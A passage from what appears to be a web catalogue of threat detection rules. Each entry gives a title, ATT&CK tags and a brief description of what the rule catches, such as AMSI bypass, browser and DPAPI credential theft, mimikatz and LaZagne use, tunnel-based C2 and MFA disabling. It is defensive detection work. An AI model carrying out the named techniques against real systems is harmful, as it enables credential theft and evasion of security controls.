    calendar Sep 2, 2024 · attack.privilege-escalation attack.t1068 cve.2022-41120 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120)


    Read More
  • Ursnif Redirection Of Discovery Commands

    calendar Sep 2, 2024 · attack.execution attack.t1059 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.


    Read More
  • Visual Studio Code Tunnel Execution

    calendar Sep 2, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel


    Read More
  • Visual Studio Code Tunnel Remote File Creation

    calendar Sep 2, 2024 · attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of file by the "node.exe" process in the ".vscode-server" directory. Could be a sign of remote file creation via VsCode tunnel feature


    Read More
  • Visual Studio Code Tunnel Service Installation

    calendar Sep 2, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects the installation of VsCode tunnel (code-tunnel) as a service.


    Read More
  • Visual Studio Code Tunnel Shell Execution

    calendar Sep 2, 2024 · attack.command-and-control attack.t1071.001  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.


    Read More
  • A Rule Has Been Deleted From The Windows Firewall Exception List

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a single rules or all of the rules have been deleted from the Windows Defender Firewall


    Read More
  • Uncommon New Firewall Rule Added In Windows Firewall Exception List

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1562.004  ·
    Share on: twitter facebook linkedin copy

    Detects when a rule has been added to the Windows Firewall exception list


    Read More
  • System Network Discovery - macOS

    calendar Aug 29, 2024 · attack.discovery attack.t1016  ·
    Share on: twitter facebook linkedin copy

    Detects enumeration of local network configuration


    Read More
  • Antivirus Filter Driver Disallowed On Dev Drive - Registry

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects activity that indicates a user disabling the ability for Antivirus mini filter to inspect a "Dev Drive".


    Read More
  • Emotet Loader Execution Via .LNK File

    calendar Aug 29, 2024 · attack.execution attack.t1059.006 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign.


    Read More
  • FakeUpdates/SocGholish Activity

    calendar Aug 29, 2024 · attack.execution attack.t1059.001 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell.


    Read More
  • File Explorer Folder Opened Using Explorer Folder Shortcut Via Shell

    calendar Aug 29, 2024 · attack.discovery attack.t1135  ·
    Share on: twitter facebook linkedin copy

    Detects the initial execution of "cmd.exe" which spawns "explorer.exe" with the appropriate command line arguments for opening the "My Computer" folder.


    Read More
  • HackTool - SharpWSUS/WSUSpendu Execution

    calendar Aug 29, 2024 · attack.execution attack.lateral-movement attack.t1210  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of SharpWSUS or WSUSpendu, utilities that allow for lateral movement through WSUS. Windows Server Update Services (WSUS) is a critical component of Windows systems and is frequently configured in a way that allows an attacker to circumvent internal networking limitations.


    Read More
  • Hiding User Account Via SpecialAccounts Registry Key

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1564.002  ·
    Share on: twitter facebook linkedin copy

    Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide user account from being listed on the logon screen.


    Read More
  • Potential AMSI Bypass Via .NET Reflection

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning


    Read More
  • Potential CVE-2022-29072 Exploitation Attempt

    calendar Aug 29, 2024 · attack.execution cve.2022-29072 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process.


    Read More
  • Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity

    calendar Aug 29, 2024 · attack.initial-access attack.t1190 cve.2023-34362 detection.emerging-threats  ·
    Share on: twitter facebook linkedin copy

    Detects file indicators of potential exploitation of MOVEit CVE-2023-34362.


    Read More
  • Potential Privilege Escalation via Local Kerberos Relay over LDAP

    calendar Aug 29, 2024 · attack.privilege-escalation attack.credential-access attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detects a suspicious local successful logon event where the Logon Package is Kerberos, the remote address is set to localhost, and the target user SID is the built-in local Administrator account. This may indicate an attempt to leverage a Kerberos relay attack variant that can be used to elevate privilege locally from a domain joined limited user to local System privileges.


    Read More
  • Python Function Execution Security Warning Disabled In Excel - Registry

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the registry value "PythonFunctionWarnings" that would prevent any warnings or alerts from showing when Python functions are about to be executed. Threat actors could run malicious code through the new Microsoft Excel feature that allows Python to run within the spreadsheet.


    Read More
  • RestrictedAdminMode Registry Value Tampering

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise


    Read More
  • RestrictedAdminMode Registry Value Tampering - ProcCreation

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise


    Read More
  • Sdiagnhost Calling Suspicious Child Process

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1036 attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)


    Read More
  • Bad Opsec Defaults Sacrificial Processes With Improper Arguments

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1218.011  ·
    Share on: twitter facebook linkedin copy

    Detects attackers using tooling with bad opsec defaults. E.g. spawning a sacrificial process to inject a capability into the process without taking into account how the process is normally run. One trivial example of this is using rundll32.exe without arguments as a sacrificial process (default in CS, now highlighted by c2lint), running WerFault without arguments (Kraken - credit am0nsec), and other examples.


    Read More
  • Cab File Extraction Via Wusa.EXE From Potentially Suspicious Paths

    calendar Aug 29, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "wusa.exe" (Windows Update Standalone Installer) utility to extract ".cab" files using the "/extract" argument from potentially suspicious paths.


    Read More
  • COM Object Execution via Xwizard.EXE

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Xwizard tool with the "RunWizard" flag and a GUID like argument. This utility can be abused in order to run custom COM object created in the registry.


    Read More
  • New Capture Session Launched Via DXCap.EXE

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.


    Read More
  • Potential DLL Injection Via AccCheckConsole

    calendar Aug 29, 2024 · attack.execution detection.threat-hunting  ·
    Share on: twitter facebook linkedin copy

    Detects the execution "AccCheckConsole" a command-line tool for verifying the accessibility implementation of an application's UI. One of the tests that this checker can run are called "verification routine", which tests for things like Consistency, Navigation, etc. The tool allows a user to provide a DLL that can contain a custom "verification routine". An attacker can build such DLLs and pass it via the CLI, which would then be loaded in the context of the "AccCheckConsole" utility.


    Read More
  • Potential DLL Sideloading Using Coregen.exe

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1218 attack.t1055  ·
    Share on: twitter facebook linkedin copy

    Detect usage of the "coregen.exe" (Microsoft CoreCLR Native Image Generator) binary to sideload arbitrary DLLs.


    Read More
  • Potentially Suspicious EventLog Recon Activity Using Log Query Utilities

    calendar Aug 29, 2024 · attack.credential-access attack.discovery attack.t1552  ·
    Share on: twitter facebook linkedin copy

    Detects execution of different log query utilities and commands to search and dump the content of specific event logs or look for specific event IDs. This technique is used by threat actors in order to extract sensitive information from events logs such as usernames, IP addresses, hostnames, etc.


    Read More
  • Process Memory Dump via RdrLeakDiag.EXE

    calendar Aug 29, 2024 · attack.credential-access attack.t1003.001  ·
    Share on: twitter facebook linkedin copy

    Detects the use of the Microsoft Windows Resource Leak Diagnostic tool "rdrleakdiag.exe" to dump process memory


    Read More
  • Program Executed Using Proxy/Local Command Via SSH.EXE

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detect usage of the "ssh.exe" binary as a proxy to launch other programs.


    Read More
  • Suspicious Child Process Of Wermgr.EXE

    calendar Aug 29, 2024 · attack.defense-evasion attack.privilege-escalation attack.t1055 attack.t1036  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious Windows Error Reporting manager (wermgr.exe) child process


    Read More
  • Uncommon Sigverif.EXE Child Process

    calendar Aug 29, 2024 · attack.defense-evasion attack.t1216  ·
    Share on: twitter facebook linkedin copy

    Detects uncommon child processes spawning from "sigverif.exe", which could indicate potential abuse of the latter as a living of the land binary in order to proxy execution.


    Read More
  • Windows Binary Executed From WSL

    calendar Aug 29, 2024 · attack.execution attack.defense-evasion attack.t1202  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Windows binaries from within a WSL instance. This could be used to masquerade parent-child relationships


    Read More
  • Wusa.EXE Executed By Parent Process Located In Suspicious Location

    calendar Aug 29, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the "wusa.exe" (Windows Update Standalone Installer) utility by a parent process that is located in a suspicious location. Attackers could instantiate an instance of "wusa.exe" in order to bypass User Account Control (UAC). They can duplicate the access token from "wusa.exe" to gain elevated privileges.


    Read More
  • Potential Active Directory Reconnaissance/Enumeration Via LDAP

    calendar Aug 27, 2024 · attack.discovery attack.t1069.002 attack.t1087.002 attack.t1482  ·
    Share on: twitter facebook linkedin copy

    Detects potential Active Directory enumeration via LDAP


    Read More
  • Disable Important Scheduled Task

    calendar Aug 26, 2024 · attack.impact attack.t1489  ·
    Share on: twitter facebook linkedin copy

    Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities


    Read More
  • DNS Query To Put.io - DNS Client

    calendar Aug 23, 2024 · attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects DNS queries for subdomains related to "Put.io" sharing website.


    Read More
  • Network Connection Initiated From Process Located In Potentially Suspicious Or Uncommon Location

    calendar Aug 23, 2024 · attack.command-and-control attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects a network connection initiated by programs or processes running from suspicious or uncommon files system locations.


    Read More
  • Suspicious Download From File-Sharing Website Via Bitsadmin

    calendar Aug 23, 2024 · attack.defense-evasion attack.persistence attack.t1197 attack.s0190 attack.t1036.003  ·
    Share on: twitter facebook linkedin copy

    Detects usage of bitsadmin downloading a file from a suspicious domain


    Read More
  • Suspicious File Downloaded From File-Sharing Website Via Certutil.EXE

    calendar Aug 23, 2024 · attack.defense-evasion attack.t1027  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.


    Read More
  • Suspicious Remote AppX Package Locations

    calendar Aug 23, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects an appx package added to the pipeline of the "to be processed" packages which was downloaded from a suspicious domain.


    Read More
  • Driver Added To Disallowed Images In HVCI - Registry

    calendar Aug 21, 2024 · attack.defense-evasion  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "HVCIDisallowedImages" registry value to potentially add a driver to the list, in order to prevent it from loading.


    Read More
  • Hidden Flag Set On File/Directory Via Chflags - MacOS

    calendar Aug 21, 2024 · attack.defense-evasion attack.t1218 attack.t1564.004 attack.t1552.001 attack.t1105  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the "chflags" utility with the "hidden" flag, in order to hide files on MacOS. When a file or directory has this hidden flag set, it becomes invisible to the default file listing commands and in graphical file browsers.


    Read More
  • User Risk and MFA Registration Policy Updated

    calendar Aug 21, 2024 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects changes and updates to the user risk and MFA registration policy. Attackers can modified the policies to Bypass MFA, weaken security thresholds, facilitate further attacks, maintain persistence.


    Read More
  • Multi Factor Authentication Disabled For User Account

    calendar Aug 21, 2024 · attack.credential-access attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects changes to the "StrongAuthenticationRequirement" value, where the state is set to "0" or "Disabled". Threat actors were seen disabling multi factor authentication for users in order to maintain or achieve access to the account. Also see in SIM Swap attacks.


    Read More
  • Data Export From MSSQL Table Via BCP.EXE

    calendar Aug 20, 2024 · attack.execution attack.t1048  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the BCP utility in order to export data from the database. Attackers were seen saving their malware to a database column or table and then later extracting it via "bcp.exe" into a file.


    Read More
  • Potentially Suspicious Rundll32.EXE Execution of UDL File

    calendar Aug 16, 2024 · attack.execution attack.t1218.011 attack.t1071  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.


    Read More
  • Suspicious Rundll32 Execution of UDL File

    calendar Aug 16, 2024 · attack.execution attack.t1218.011 attack.t1071  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file. Threat actors can abuse the technique as a phishing vector to capture authentication credentials or other sensitive data.


    Read More
  • Diskshadow Script Mode - Execution From Potential Suspicious Location

    calendar Aug 16, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.


    Read More
  • HackTool - LaZagne Execution

    calendar Aug 16, 2024 · attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of the LaZagne. A utility used to retrieve multiple types of passwords stored on a local computer. LaZagne has been leveraged multiple times by threat actors in order to dump credentials.


    Read More
  • Capture Wi-Fi password

    calendar Aug 14, 2024  ·
    Share on: twitter facebook linkedin copy

    Capture Wi-Fi password


    Read More
  • Powershell Token Obfuscation - Powershell

    calendar Aug 13, 2024 · attack.defense-evasion attack.t1027.009  ·
    Share on: twitter facebook linkedin copy

    Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation


    Read More
  • 7Zip Compressing Dump Files

    calendar Aug 12, 2024 · attack.collection attack.t1560.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of 7z in order to compress a file with a ".dmp"/".dump" extension, which could be a step in a process of dump file exfiltration.


    Read More
  • A Member Was Added to a Security-Enabled Global Group

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects activity when a member is added to a security-enabled global group


    Read More
  • A Member Was Removed From a Security-Enabled Global Group

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects activity when a member is removed from a security-enabled global group


    Read More
  • A New Trust Was Created To A Domain

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Addition of domains is seldom and should be verified for legitimacy.


    Read More
  • A Security-Enabled Global Group Was Deleted

    calendar Aug 12, 2024 · attack.persistence attack.t1098  ·
    Share on: twitter facebook linkedin copy

    Detects activity when a security-enabled global group is deleted


    Read More
  • Abusable DLL Potential Sideloading From Suspicious Location

    calendar Aug 12, 2024 · attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects potential DLL sideloading of DLLs that are known to be abused from suspicious locations


    Read More
  • Abuse of Service Permissions to Hide Services Via Set-Service

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)


    Read More
  • Abuse of Service Permissions to Hide Services Via Set-Service - PS

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.t1574.011  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)


    Read More
  • Abused Debug Privilege by Arbitrary Parent Processes

    calendar Aug 12, 2024 · attack.privilege-escalation attack.t1548  ·
    Share on: twitter facebook linkedin copy

    Detection of unusual child processes by different system processes


    Read More
  • Abusing Print Executable

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Attackers can use print.exe for remote file copy


    Read More
  • Access To ADMIN$ Network Share

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1021.002  ·
    Share on: twitter facebook linkedin copy

    Detects access to ADMIN$ network share


    Read More
  • Access to Browser Login Data

    calendar Aug 12, 2024 · attack.credential-access attack.t1555.003  ·
    Share on: twitter facebook linkedin copy

    Adversaries may acquire credentials from web browsers by reading files specific to the target browser. Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store.


    Read More
  • Access To Crypto Currency Wallets By Uncommon Applications

    calendar Aug 12, 2024 · attack.t1003 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects file access requests to crypto currency files by uncommon processes. Could indicate potential attempt of crypto currency wallet stealing.


    Read More
  • Access To Potentially Sensitive Sysvol Files By Uncommon Applications

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.006  ·
    Share on: twitter facebook linkedin copy

    Detects file access requests to potentially sensitive files hosted on the Windows Sysvol share.


    Read More
  • Access To Windows Credential History File By Uncommon Applications

    calendar Aug 12, 2024 · attack.credential-access attack.t1555.004  ·
    Share on: twitter facebook linkedin copy

    Detects file access requests to the Windows Credential History File by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::credhist" function


    Read More
  • Access To Windows DPAPI Master Keys By Uncommon Applications

    calendar Aug 12, 2024 · attack.credential-access attack.t1555.004  ·
    Share on: twitter facebook linkedin copy

    Detects file access requests to the the Windows Data Protection API Master keys by an uncommon application. This can be a sign of credential stealing. Example case would be usage of mimikatz "dpapi::masterkey" function


    Read More
  • Account Created And Deleted Within A Close Time Frame

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1078  ·
    Share on: twitter facebook linkedin copy

    Detects when an account was created and deleted in a short period of time.


    Read More
  • Account Disabled or Blocked for Sign in Attempts

    calendar Aug 12, 2024 · attack.initial-access attack.t1078.004  ·
    Share on: twitter facebook linkedin copy

    Detects when an account is disabled or blocked for sign in but tried to log in


    Read More
  • Account Lockout

    calendar Aug 12, 2024 · attack.credential-access attack.t1110  ·
    Share on: twitter facebook linkedin copy

    Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.


    Read More
  • Account Tampering - Suspicious Failed Logon Reasons

    calendar Aug 12, 2024 · attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access attack.t1078  ·
    Share on: twitter facebook linkedin copy

    This method uses uncommon error codes on failed logons to determine suspicious activity and tampering with accounts that have been disabled or somehow restricted.


    Read More
  • Activate Suppression of Windows Security Center Notifications

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detect set Notification_Suppress to 1 to disable the Windows security center notification


    Read More
  • Active Directory Computers Enumeration With Get-AdComputer

    calendar Aug 12, 2024 · attack.discovery attack.t1018 attack.t1087.002  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "Get-AdComputer" to enumerate Computers or properties within Active Directory.


    Read More
  • Active Directory Database Snapshot Via ADExplorer

    calendar Aug 12, 2024 · attack.credential-access attack.t1552.001 attack.t1003.003  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of Sysinternals ADExplorer with the "-snapshot" flag in order to save a local copy of the active directory database.


    Read More
  • Active Directory Group Enumeration With Get-AdGroup

    calendar Aug 12, 2024 · attack.discovery attack.t1069.002  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "Get-AdGroup" cmdlet to enumerate Groups within Active Directory


    Read More
  • Active Directory Kerberos DLL Loaded Via Office Application

    calendar Aug 12, 2024 · attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects Kerberos DLL being loaded by an Office Product


    Read More
  • Active Directory Parsing DLL Loaded Via Office Application

    calendar Aug 12, 2024 · attack.execution attack.t1204.002  ·
    Share on: twitter facebook linkedin copy

    Detects DSParse DLL being loaded by an Office Product


    Read More
  • Active Directory Replication from Non Machine Account

    calendar Aug 12, 2024 · attack.credential-access attack.t1003.006  ·
    Share on: twitter facebook linkedin copy

    Detects potential abuse of Active Directory Replication Service (ADRS) from a non machine account to request credentials.


    Read More
  • Active Directory Structure Export Via Csvde.EXE

    calendar Aug 12, 2024 · attack.exfiltration attack.discovery attack.t1087.002  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "csvde.exe" in order to export organizational Active Directory structure.


    Read More
  • Active Directory Structure Export Via Ldifde.EXE

    calendar Aug 12, 2024 · attack.exfiltration  ·
    Share on: twitter facebook linkedin copy

    Detects the execution of "ldifde.exe" in order to export organizational Active Directory structure.


    Read More
  • Activity From Anonymous IP Address

    calendar Aug 12, 2024 · attack.t1078 attack.persistence attack.defense-evasion attack.privilege-escalation attack.initial-access  ·
    Share on: twitter facebook linkedin copy

    Identifies that users were active from an IP address that has been identified as an anonymous proxy IP address.


    Read More
  • Activity from Anonymous IP Addresses

    calendar Aug 12, 2024 · attack.command-and-control attack.t1573  ·
    Share on: twitter facebook linkedin copy

    Detects when a Microsoft Cloud App Security reported when users were active from an IP address that has been identified as an anonymous proxy IP address.


    Read More
  • Activity from Infrequent Country

    calendar Aug 12, 2024 · attack.command-and-control attack.t1573  ·
    Share on: twitter facebook linkedin copy

    Detects when a Microsoft Cloud App Security reported when an activity occurs from a location that wasn't recently or never visited by any user in the organization.


    Read More
  • Activity from Suspicious IP Addresses

    calendar Aug 12, 2024 · attack.command-and-control attack.t1573  ·
    Share on: twitter facebook linkedin copy

    Detects when a Microsoft Cloud App Security reported users were active from an IP address identified as risky by Microsoft Threat Intelligence. These IP addresses are involved in malicious activities, such as Botnet C&C, and may indicate compromised account.


    Read More
  • Activity Performed by Terminated User

    calendar Aug 12, 2024 · attack.impact  ·
    Share on: twitter facebook linkedin copy

    Detects when a Microsoft Cloud App Security reported for users whose account were terminated in Azure AD, but still perform activities in other platforms such as AWS or Salesforce. This is especially relevant for users who use another account to manage resources, since these accounts are often not terminated when a user leaves the company.


    Read More
  • AD Groups Or Users Enumeration Using PowerShell - PoshModule

    calendar Aug 12, 2024 · attack.discovery attack.t1069.001  ·
    Share on: twitter facebook linkedin copy

    Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.


    Read More
  • AD Groups Or Users Enumeration Using PowerShell - ScriptBlock

    calendar Aug 12, 2024 · attack.discovery attack.t1069.001  ·
    Share on: twitter facebook linkedin copy

    Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.


    Read More
  • AD Object WriteDAC Access

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1222.001  ·
    Share on: twitter facebook linkedin copy

    Detects WRITE_DAC access to a domain object


    Read More
  • AD Privileged Users or Groups Reconnaissance

    calendar Aug 12, 2024 · attack.discovery attack.t1087.002  ·
    Share on: twitter facebook linkedin copy

    Detect priv users or groups recon based on 4661 eventid and known privileged users or groups SIDs


    Read More
  • ADCS Certificate Template Configuration Vulnerability

    calendar Aug 12, 2024 · attack.privilege-escalation attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects certificate creation with template allowing risk permission subject


    Read More
  • ADCS Certificate Template Configuration Vulnerability with Risky EKU

    calendar Aug 12, 2024 · attack.privilege-escalation attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects certificate creation with template allowing risk permission subject and risky EKU


    Read More
  • Add Debugger Entry To AeDebug For Persistence

    calendar Aug 12, 2024 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence which will get invoked when an application crashes


    Read More
  • Add Debugger Entry To Hangs Key For Persistence

    calendar Aug 12, 2024 · attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects when an attacker adds a new "Debugger" value to the "Hangs" key in order to achieve persistence which will get invoked when an application crashes


    Read More
  • Add DisallowRun Execution to Registry

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1112  ·
    Share on: twitter facebook linkedin copy

    Detect set DisallowRun to 1 to prevent user running specific computer program


    Read More
  • Add Insecure Download Source To Winget

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects usage of winget to add a new insecure (http) download source. Winget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)


    Read More
  • Add New Download Source To Winget

    calendar Aug 12, 2024 · attack.defense-evasion attack.execution attack.t1059  ·
    Share on: twitter facebook linkedin copy

    Detects usage of winget to add new additional download sources


    Read More
  • Add or Remove Computer from DC

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1207  ·
    Share on: twitter facebook linkedin copy

    Detects the creation or removal of a computer. Can be used to detect attacks such as DCShadow via the creation of a new SPN.


    Read More
  • Add SafeBoot Keys Via Reg Utility

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1562.001  ·
    Share on: twitter facebook linkedin copy

    Detects execution of "reg.exe" commands with the "add" or "copy" flags on safe boot registry keys. Often used by attacker to allow the ransomware to work in safe mode as some security products do not


    Read More
  • Add Windows Capability Via PowerShell Cmdlet

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.


    Read More
  • Add Windows Capability Via PowerShell Script

    calendar Aug 12, 2024 · attack.execution  ·
    Share on: twitter facebook linkedin copy

    Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others.


    Read More
  • Added Credentials to Existing Application

    calendar Aug 12, 2024 · attack.t1098.001 attack.persistence  ·
    Share on: twitter facebook linkedin copy

    Detects when a new credential is added to an existing application. Any additional credentials added outside of expected processes could be a malicious actor using those credentials.


    Read More
  • Added Owner To Application

    calendar Aug 12, 2024 · attack.t1552 attack.credential-access  ·
    Share on: twitter facebook linkedin copy

    Detects when a new owner is added to an application. This gives that account privileges to make modifications and configuration changes to the application.


    Read More
  • AddinUtil.EXE Execution From Uncommon Directory

    calendar Aug 12, 2024 · attack.defense-evasion attack.t1218  ·
    Share on: twitter facebook linkedin copy

    Detects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.


    Read More
  • Addition of SID History to Active Directory Object

    calendar Aug 12, 2024 · attack.persistence attack.privilege-escalation attack.t1134.005  ·
    Share on: twitter facebook linkedin copy

    An attacker can use the SID history attribute to gain additional privileges.


    Read More
  • ADFS Database Named Pipe Connection By Uncommon Tool

    calendar Aug 12, 2024 · attack.collection attack.t1005  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database). Used to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.


    Read More
  • Admin User Remote Logon

    calendar Aug 12, 2024 · attack.lateral-movement attack.t1078.001 attack.t1078.002 attack.t1078.003 car.2016-04-005  ·
    Share on: twitter facebook linkedin copy

    Detect remote login by Administrator user (depending on internal pattern).


    Read More
  • ADSelfService Exploitation

    calendar Aug 12, 2024 · cve.2021-40539 detection.emerging-threats attack.initial-access attack.t1190  ·
    Share on: twitter facebook linkedin copy

    Detects suspicious access to URLs that was noticed in cases in which attackers exploitated the ADSelfService vulnerability CVE-2021-40539


    Read More
  • ADSI-Cache File Creation By Uncommon Tool

    calendar Aug 12, 2024 · attack.t1001.003 attack.command-and-control  ·
    Share on: twitter facebook linkedin copy

    Detects the creation of an "Active Directory Schema Cache File" (.sch) file by an uncommon tool.


    Read More
  • Advanced IP Scanner - File Event

    calendar Aug 12, 2024 · attack.discovery attack.t1046  ·
    Share on: twitter facebook linkedin copy

    Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.


    Read More
  • Adwind RAT / JRAT

